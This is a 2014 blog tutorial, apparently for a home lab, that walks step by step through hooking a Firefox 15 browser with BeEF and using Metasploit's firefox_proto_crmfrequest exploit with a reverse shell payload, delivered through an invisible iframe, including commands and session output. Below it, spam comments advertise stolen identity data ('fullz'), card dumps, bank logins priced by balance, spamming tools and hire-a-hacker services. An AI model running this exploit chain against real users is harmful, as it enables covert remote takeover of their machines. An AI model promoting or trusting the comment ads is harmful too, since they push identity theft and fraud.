Phreaklets: Using BEEF & Metasploit to pop a shell with Firefox on Linux

Friday, April 4, 2014

Using BEEF & Metasploit to pop a shell with Firefox on Linux

Ingredients

Bake the following VMs (I use VMware, I guess this will work with VirtualBox too but I haven't tried it)

Kali Linux (of course)
Ubuntu Hardy Heron 8.04.1 LTS

Install Firefox 15.0.1

For the purposes of this blog post, the Kali Linux VM has the IP address of 192.168.70.212 and the Ubuntu VM has 192.168.70.225, you will need to change this to suit your local setup
I would use the NAT or Local Host-only networking configuration for your VMware setup

Kali Linux

Check that BEEF is installed

apt-get install beef-xss

Enable metasploit integration

Edit /etc/beef-xss/config.yaml

Set metasploit:
enable: true

Edit /usr/share/beef-xss/extensions/metasploit/config.yaml

Set host and callback_host to be the IP address of the external interface of your Kali Linux VM

Start msfconsole and then issue the following command to enable the RPC server:

load msgrpc ServerHost=<your IP address> Pass=abc123

Start beef

cd /usr/share/beef-xss

beef -x

You can now browse to the BEEF UI (user/pass: beef) and start hooking browsers! :-)

http://127.0.0.1:3000/ui/panel

Ubuntu

BEEF supplies you with two demo pages, I found the advanced one to be more reliable, so fire up Firefox 15.0.1 and browse to:

http://192.168.70.212:3000/demos/butcher/index.html

Your browser will now be hooked into BEEF, if you go back to your Kali VM and check out the BEEF panel, you should see your browser hooked there.
There are all kinds of funky things that you can do, but for now, we're going to concentrate on popping a shell

Kali Linux

Go to your running msfconsole and enter

use exploit/multi/browser/firefox_proto_crmfrequest
set PAYLOAD firefox/shell_reverse_tcp
set LHOST 192.168.70.212
exploit

Now metasploit should be running the exploit server and it will provide you with a target URL (http://192.168.70.212:8080/GS0HRW52gQ5Vt), the next step is to get the victim browser to access it
The stealthy way to do this is to get BEEF to generate an invisible iframe for you on the victim browser
Go back to the BEEF panel and choose your hooked browser and then:

Commands -> Misc -> Create invisible iframe
In the URL, put the target URL you got from metasploit (e.g., http://192.168.70.212:8080/GS0HRW52gQ5Vt)

You should now see the following output in msfconsole:

[*] 192.168.70.225 firefox_proto_crmfrequest - Gathering target information.

[*] 192.168.70.225 firefox_proto_crmfrequest - Sending response HTML.

[*] 192.168.70.225 firefox_proto_crmfrequest - Sending HTML [*] 192.168.70.225 firefox_proto_crmfrequest - Sending the malicious addon

[*] Command shell session 1 opened (192.168.70.212:4444 -> 192.168.70.225:46429) at 2014-04-04 12:11:44 +0100

Congrats, you've now popped a shell! :-)
Confirm with: sessions -l
Start to interact with it with: sessions -i <session number>
Try something like:

uname -a
Linux vuln-client 2.6.24-26-generic #1 SMP Tue Dec 1 18:37:31 UTC 2009 i686 GNU/Linux

Enjoy the pwnage, poppin' shells like you're at a seafood restaurant! ;-)

5 comments:

AnonymousApril 20, 2022 at 1:46 AM
Phreaklets: Using Beef And Metasploit To Pop A Shell With Firefox On Linux >>>>> Download Now

>>>>> Download Full

Phreaklets: Using Beef And Metasploit To Pop A Shell With Firefox On Linux >>>>> Download LINK

>>>>> Download Now

Phreaklets: Using Beef And Metasploit To Pop A Shell With Firefox On Linux >>>>> Download Full

>>>>> Download LINK pH
ReplyDelete
Replies
Cyber ZoneFebruary 2, 2023 at 12:26 PM
Hello Everyone

Selling SSN DOB Fullz in bulk
DL & work history will be include (if needed)
High Credit Scores USA Fullz/Pros

USA/UK/Canada CC Fullz also available
Dumps Tutorials & Dumps with pin codes available (101 & 202)
Business Fullz with EIN
Office365 Logs in bulk

Here I'm

TG/ICQ = @killhacks
WA = +92 317 2721122
Emails = exploit dot tools4u at gmail dot com
Wickr = peeterhacks

Hacking, Spamming, Carding Stuff also available
Tools with tutorials & Ebooks
Mailers/Brutes/Viruses
Kali Linux Full course
D**P/D**k web Courses with Legit Links
Combos/logs/I.P's/Proxies

Legit & Genuine Tools

Emails = exploit dot tools4u at gmail dot com
Wickr = peeterhacks
TG/ICQ = @killhacks
WA = +92 317 2721122
ReplyDelete
Replies
Toolz StoreMarch 13, 2024 at 2:20 PM
Hey Guyz!
Hope You Doing Well..
-------------
I'm selling 100% Working And Genuine Spamming Tools Like,
-/Windows RDP, 30$ per month high speed all locations
-/Inbox SMTP , send up to 50k inbox mails everyday
-/We have AWS, IONS, Office365
-/SMS Leads-Phone Number any countries
-/Email leads for banks, office 365 or any other list you need
-/Office 365 Email Leads
-/Bulk Phone Number Validators
-/cPanel hostings
-/WHMs
-/Windows RDPs
-/inbox SMTPs

And Many Other Spamming Tools And Scam Pages Are Available.
-------------
Contact Me >24/7,
My tele Gram @cpanelmaster
My I.c.q @cpanelmaster
You can visit my Site https://toolz.store
-------------
Come Lets make a business together.

Thanks.
ReplyDelete
Replies
Leads ShopApril 26, 2025 at 2:44 PM
Selling USA/UK/CANADA LEADS-FULLZ-DATABASE

Huge discounts on bulk order
Replacement for bad and invalid info
Payment in any Crypto
Success Ratio 80-90%
Service 24/7
------------------------------------------------------
Offering USA-UK-CANADA STUFF

SSN SIN DOB Address Phone Email
SSN DOB DL Address Employment Bank Info & Routing number
UK NIN DOB DL Address Sort Code
SIN DOB Address MMN Phone Email
Real DL Scan Front back with selfie & SSN
PASSPORT PHOTOS
YOUNG AND OLD AGE FULLZ
EIN FULLZ
BUSINESS OWNER LEADS
PAYDAY & PERSONAL LOAN LEADS
FIRST HIT SWEEPSTAKES
CASINO LEADS
HOME OWNERS LEADS
EMPLOYEE LEADS
USA BANK LEADS
EMAIL, COMBOS & PHONE NUMBER LEADS
CRYPTO & FOREX LEADS
STOCK MARKET LEADS
CARS DATA BASE WITH REGISTRATION NUMBER
LOAN & CARDING METHODS
...AND MANY OTHER STUFF ON DEMAND
-------------------------------------------------------
Contact us 24/7:
Tele gr@m - @Lead_pro20
Whats App - (+1).. 605… 8461.. 870…
Email - datatrader3 at g mail dot com
ReplyDelete
Replies
shahbaz AlamApril 9, 2026 at 12:22 AM
Need The To Hire A Hacker❓ Then contact Vcare✅

The really amazing deal about contacting Vcare is that the Hack done by us can’t get traced to you, as every Hacking job we do is strongly protected by our Firewall. It’s like saying if anyone tries to trace the Hack, it will lead them to us and we block whatever actions they are doing.

We have been Invisible to Authorities for almost a decade now, not really about us comes out, you can only see comments made by us or about us.

Another Amazing thing to you benefit from Hiring our Hackers is that you get a Legit and the best Hacking service, As we provide you with Professional Hackers who have their Hacking Areas of specialization.
We perform every Hack there is, using special Hacking tools we get from the dark web.

Some list of Hacking Services we provide are-:
▪️Phone Hacking & Cloning ✅
▪️Computer Hacking ✅
▪️Emails & Social Media Account Hacking✅
▪️Recovering Deleted Files✅
▪️Tracking & Finding People ✅
▪️Hunting Down Scammers✅
▪️Hack detecting ✅
▪️Stealing/Copying Files & Documents From Restricted Networks and Servers ✅
▪️Bitcoin Multiplication✅
▪️Binary Option Money Recovery ✅
▪️Forex Trading Money Recovery✅
▪️IQ Option Money Recovery✅
And lots more.....

Bank Logins Prices US UK CA AU EU

- Bank Us : ( NAVY Federal Union,BOA,CHASE,Wells Fargo...)

. Balance 5000$ = 250$

. Balance 8000$ = 400$

. Balance 12000$ = 600$

. Balance 15000$ = 800$

. Balance 20000$ = 1000$

- Bank UK : ( LLOYDS TSB,BARCLAYS,Standard Chartered,HSBC...)

. Balance 5000 GBP = 300 GBP

. Balance 12000 GBP = 600 GBP

. Balance 16000 GBP = 700 GBP

. Balance 20000 GBP = 1000 GBP

. Balance 30000 GBP = 1200 GBP

Whatever Hacking service you require, just DM us at IDs provided below.
TeleGram: @Vcare524
Discord: @Vcare089
Mail: wuhacker@yahoo.com

VCARE
2026 © All Right Reserved.
ReplyDelete
Replies

Add comment